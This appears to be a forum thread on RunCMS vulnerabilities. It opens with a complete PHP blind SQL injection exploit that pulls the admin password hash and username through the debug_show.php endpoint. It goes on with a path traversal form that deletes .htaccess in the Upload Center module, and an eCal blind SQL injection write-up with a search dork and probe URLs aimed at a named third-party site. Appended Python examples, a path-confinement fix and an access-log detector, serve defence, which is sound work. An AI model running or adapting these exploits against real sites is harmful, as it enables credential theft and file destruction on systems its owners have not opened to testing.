$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';

function send($packet)
{
  global $proxy, $host, $port, $html, $proxy_regex;
  if ($proxy=='') {
    $ock=fsockopen(gethostbyname($host),$port);
    if (!$ock) {
      echo 'No response from '.$host.':'.$port; die;
    }
  }
  else {
    $c = preg_match($proxy_regex,$proxy);
    if (!$c) {
      echo 'Not a valid proxy...';die;
    }
    $parts=explode(':',$proxy);
    $parts[1]=(int)$parts[1];
    echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
    $ock=fsockopen($parts[0],$parts[1]);
    if (!$ock) {
      echo 'No response from proxy...';die;
    }
  }
  fputs($ock,$packet);
  if ($proxy=='') {
    $html='';
    while (!feof($ock)) {
      $html.=fgets($ock);
    }
  }
  else {
    $html='';
    while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
      $html.=fread($ock,1);
    }
  }
  fclose($ock);
}

$host=$argv[1];
$path=$argv[2];
$port=80;
$proxy="";
$prefix="runcms";
for ($i=3; $i<$argc; $i++){
  $temp=$argv[$i][0].$argv[$i][1];
  if ($temp=="-p") { $port=(int)str_replace("-p","",$argv[$i]); }
  if ($temp=="-P") { $proxy=str_replace("-P","",$argv[$i]); }
  if ($temp=="-T") { $prefix=str_replace("-T","",$argv[$i]); }
}

if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}
if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}

$md5s[0]=0;//null
$md5s=array_merge($md5s,range(48,57)); //numbers
$md5s=array_merge($md5s,range(97,102));//a-f letters
//print_r(array_values($md5s));

echo "md5 hash -> ";
$j=1;$password="";
while (!strstr($password,chr(0))){
  for ($i=0; $i<=255; $i++){
    if (in_array($i,$md5s)){
      $executed_queries=array();
      //original query: EXPLAIN ...
      $executed_queries[0]="SELECT null FROM ".$prefix."_users WHERE 1=(IF((ASCII(SUBSTRING(pass,".$j.",1))=".$i."),1,999999)) AND rank=7 LIMIT 1";
      $sql=urlencode(serialize($executed_queries));
      $sql=str_replace("%22","%2522",$sql);//you know, urldecode()...
      $data ="debug_show=show_queries";
      $data.="&executed_queries=".$sql;
      $data.="&sorted=1";
      $packet ="POST ".$p."class/debug/debug_show.php HTTP/1.0\r\n";
      $packet.="Content-Type: application/x-www-form-urlencoded\r\n";
      $packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)\r\n";
      $packet.="Host: ".$host."\r\n";
      $packet.="Content-Length: ".strlen($data)."\r\n";
      $packet.="Pragma: no-cache\r\n";
      $packet.="Connection: Close\r\n\r\n";
      $packet.=$data;
      send($packet);
      if (eregi("_users </td>",$html)){$password.=chr($i);echo chr($i); sleep(1); break;}
    }
    if ($i==255) {die("Exploit failed...");}
  }
  $j++;
}
echo "\n";

echo "admin username -> ";
$j=1;$admin_user="";
while (!strstr($admin_user,chr(0))){
  for ($i=0; $i<=255; $i++){
    $executed_queries=array();
    $executed_queries[0]="SELECT null FROM ".$prefix."_users WHERE 1=(IF((ASCII(SUBSTRING(uname,".$j.",1))=".$i."),1,999999)) AND rank=7 LIMIT 1";
    $sql=urlencode(serialize($executed_queries));
    $sql=str_replace("%22","%2522",$sql);
    $data ="debug_show=show_queries";
    $data.="&executed_queries=".$sql;
    $data.="&sorted=1";
    $packet ="POST ".$p."class/debug/debug_show.php HTTP/1.0\r\n";
    $packet.="Content-Type: application/x-www-form-urlencoded\r\n";
    $packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)\r\n";
    $packet.="Host: ".$host."\r\n";
    $packet.="Content-Length: ".strlen($data)."\r\n";
    $packet.="Pragma: no-cache\r\n";
    $packet.="Connection: Close\r\n\r\n";
    $packet.=$data;
    send($packet);
    if (eregi("_users </td>",$html)){$admin_user.=chr($i);echo chr($i); sleep(1); break;}
  }
  if ($i==255) {die("Exploit failed...");}
  $j++;
}
?>

original url: http://retrogod.altervista.org/runcms_152_sql.html
How to find out the version?

/index.php

PHP:
<meta name="robots" content="index, follow" />
<meta name="generator" content=" RUNCMS 1.5.3 (build 20071016)" />
<meta name="keywords" content="enter your keywords here" />
<meta name="description" content="Enter your site description here" />
RunCMS Module Upload Center Delete File Vulnerability

version: latest -- 1.01

Showing list files Vulnerability

Vuln Code: /folder.php

PHP:
function listfiles() {
    global $ucConfig, $xoopsUser, $_GET;
    if (!$xoopsUser) {
        header("Location:".XOOPS_URL."/whyregister.php");
    } else {
        $foldername = $_GET['foldername'];
        $userfoldername = $xoopsUser->getVar("uid");
        $userfolderpath = "./cache/files/".$userfoldername;
        $imgurl = XOOPS_URL."/modules/uc/cache/files/".$userfoldername."/".$foldername;
        $imgpath = "./cache/files/".$userfoldername."/".$foldername;
        $subfolderpath = $userfolderpath."/".$foldername;
        $total = dir_stats($userfolderpath);
.....

Delete File Vulnerability

Vuln Code: /folder.php

PHP:
function deletefile() {
    global $xoopsUser, $_POST;
    $filename = $_POST['filename'];
    $foldername = $_POST['foldername'];
    $userfoldername = $xoopsUser->getVar("uid");
    if ( @file_exists("./cache/files/".$userfoldername."/".$foldername."/".$filename) ) {
        @unlink("./cache/files/".$userfoldername."/".$foldername."/".$filename);
        redirect_header("folder.php?op=listfiles&foldername=".$foldername, 3, _MD_FILEDELETEOK);
    }
}

Code:
<form action="folder.php" method="post"><td width="1%" nowrap><input type="hidden" name="op" value="deletefile" />
<input type="hidden" name="foldername" value="../../../../../" /><input type="hidden" name="filename" value=".htaccess" />
<input type="submit" class="button" value="Delete"></td></form>

ZAMUT ©
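Both functions above concatenate `foldername` and `filename` straight from the request into a path under the user's own cache directory, so `../../../../../` walks out of it and `unlink()` runs on whatever the web server can write. The following is an added example (not RunCMS or Upload Center code) in Python of the path confinement such a handler needs: reject separators and traversal components in each user-supplied segment, then normalize the joined path and require that it still lies below the user's root. The base directory and the function name are assumptions for the demonstration.

```python
import posixpath
import re

# Assumed install location of the module's per-user file store (constructed)
BASE = "/var/www/runcms/modules/uc/cache/files"

def _is_clean_segment(segment) -> bool:
    """A single directory or file name: non-empty, no separators, no traversal, no NUL,
    and no leading dot (keeps .htaccess and other dotfiles out of reach)."""
    if not isinstance(segment, str) or not segment:
        return False
    if segment in (".", "..") or segment.startswith("."):
        return False
    if "/" in segment or "\\" in segment or "\x00" in segment:
        return False
    return True

def resolve_user_file(uid, foldername, filename):
    """Return the absolute path of filename inside the caller's own folder, or None if the
    request would leave it. Callers (list, delete) must refuse to act on None."""
    if not re.fullmatch(r"\d+", str(uid)):
        return None
    if not (_is_clean_segment(foldername) and _is_clean_segment(filename)):
        return None
    user_root = posixpath.join(BASE, str(uid))
    target = posixpath.normpath(posixpath.join(user_root, foldername, filename))
    # Belt and braces: even after the segment checks, the normalized path must stay below the root.
    if not target.startswith(user_root + "/"):
        return None
    return target

def delete_user_file(uid, foldername, filename, unlink=lambda p: None) -> str:
    """Model of deletefile(): resolve first, delete only on success. The unlink callable
    is injected so the check can be exercised without touching a filesystem."""
    target = resolve_user_file(uid, foldername, filename)
    if target is None:
        return "rejected"
    unlink(target)
    return "deleted " + target

if __name__ == "__main__":
    # Constructed requests: a normal one, and the one from the form in the post
    print(delete_user_file(3, "photos", "a.jpg"))
    print(delete_user_file(3, "../../../../../", ".htaccess"))
```

The segment check is what does the work; the normpath comparison only catches a future change that starts allowing nested folder names. Logging the rejected requests with the caller's uid gives a direct signal for the traversal attempts the post describes.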
RunCMS module vulnerabilities

RunCMS Module eCal 2.4 Blind-SQL

Vulnerable product: Module eCal
Version: <= 2.4
Link: http://www.runcms.ru/modules/files/showfile.php?lid=95
Dork: "inurl:modules/ecal/"

Blind-SQL

The vulnerability is in the file localleve.php.

Vulnerable piece of code:

PHP:
$query = $db->query("SELECT * FROM ".$db->prefix("ecal")." WHERE stamp >= \"$currentyear-$currentmonth-$currentday 00:00:00\" AND locationid =$lid AND valid ='yes' ORDER BY stamp");
$kat1 = $db->query("SELECT location FROM ".$db->prefix("ecal_location")." where lid=$lid");

Exploit:

Code:
true: /modules/ecal/localleve.php?lid=1+and+1=1
false: /modules/ecal/localleve.php?lid=1+and+1=2

Example:

Code:
true: http://www.necton.lv/modules/ecal/localleve.php?lid=1+and+substring(version(),1,1)=5
false: http://www.necton.lv/modules/ecal/localleve.php?lid=1+and+substring(version(),1,1)=4
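Nearly every post in this thread shows the same three request shapes: boolean probes like `lid=1+and+1=1` / `and+1=0` (the DSecRG advisory, the click.php post, eCal above), `union select ... from runcms_users` payloads with `/**/` used as whitespace (MyAnnonces, Photo, HotNews, Reviews, Arcade, the admin pages), and requests to the unauthenticated debug scripts `class/debug/highlight.php` and `class/debug/debug_show.php`. All of them are visible in the web server's access log, so one detector serves all of those posts. The following is an added example (not from any post in the thread) in Python that runs a small rule set over constructed combined-format log lines built from the paths quoted above; the rule names, the host and the timestamps are constructed for the demonstration.

```python
import re
from urllib.parse import unquote_plus

# Combined log format: ip ident user [ts] "METHOD uri proto" status size ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<uri>\S+) \S+" (?P<status>\d{3}) \S+')

# Rules run against the decoded request URI; the names are our own labels.
RULES = [
    ("sqli-union", re.compile(r"union\s+(all\s+)?select\b", re.I)),
    ("sqli-boolean", re.compile(r"\b(and|or)\s+\d+\s*=\s*\d+\b", re.I)),
    ("sqli-blind-probe", re.compile(r"\b(substring|benchmark|sleep)\s*\(", re.I)),
    ("lfi-traversal", re.compile(r"(?:^|[=/\\])\.\.[/\\]")),
    ("debug-endpoint", re.compile(r"/class/debug/(debug_show|highlight)\.php", re.I)),
]

def normalize_uri(uri: str) -> str:
    """Decode twice so double-encoded payloads are seen, turn '+' into spaces, and fold the
    /**/ comment trick the posts use in place of whitespace."""
    return unquote_plus(unquote_plus(uri)).replace("/**/", " ")

def scan_log(lines):
    """Return {line_number: [rule names]} for every line matching at least one rule."""
    hits = {}
    for n, line in enumerate(lines, 1):
        m = LOG_RE.match(line)
        if not m:
            continue  # not a request line we understand; skip rather than guess
        uri = normalize_uri(m.group("uri"))
        matched = [name for name, rx in RULES if rx.search(uri)]
        if matched:
            hits[n] = matched
    return hits

# Constructed sample log: request paths are the ones quoted in the thread, host and IPs made up
SAMPLE_LOG = [
    '10.0.0.7 - - [20/Mar/2008:10:00:01 +0000] "GET /runcms/modules/mydownloads/brokenfile.php?lid=1+and+1=1 HTTP/1.0" 200 512',
    '10.0.0.7 - - [20/Mar/2008:10:00:02 +0000] "GET /runcms/modules/mydownloads/brokenfile.php?lid=1+and+1=0 HTTP/1.0" 200 198',
    '10.0.0.7 - - [20/Mar/2008:10:00:09 +0000] "GET /runcms/modules/photo/viewcat.php?id=150&cid=-99999/**/union/**/select/**/0,pass/**/from/**/runcms_users/* HTTP/1.0" 200 900',
    '10.0.0.8 - - [20/Mar/2008:10:01:15 +0000] "GET /runcms/modules/banners/click.php?op=click&bid=3%20and%20substring(version(),1,1)=4 HTTP/1.0" 302 0',
    '10.0.0.8 - - [20/Mar/2008:10:01:40 +0000] "GET /runcms/class/debug/highlight.php?file=../../mainfile.php HTTP/1.0" 200 3021',
    '10.0.0.9 - - [20/Mar/2008:10:02:03 +0000] "POST /runcms/class/debug/debug_show.php HTTP/1.0" 200 2210',
    '192.0.2.5 - - [20/Mar/2008:10:02:30 +0000] "GET /runcms/modules/news/index.php?storyid=12 HTTP/1.1" 200 7112',
]

if __name__ == "__main__":
    for n, names in sorted(scan_log(SAMPLE_LOG).items()):
        print(n, names)
```

The POST body that carries the serialized query for debug_show.php is not in the access log, so that rule matches on the path alone; on a production install the debug scripts should not be reachable at all, which makes any hit on them actionable. The boolean rule is deliberately narrow (a number compared to a number) to keep legitimate `and`/`or` in search strings out of the alerts.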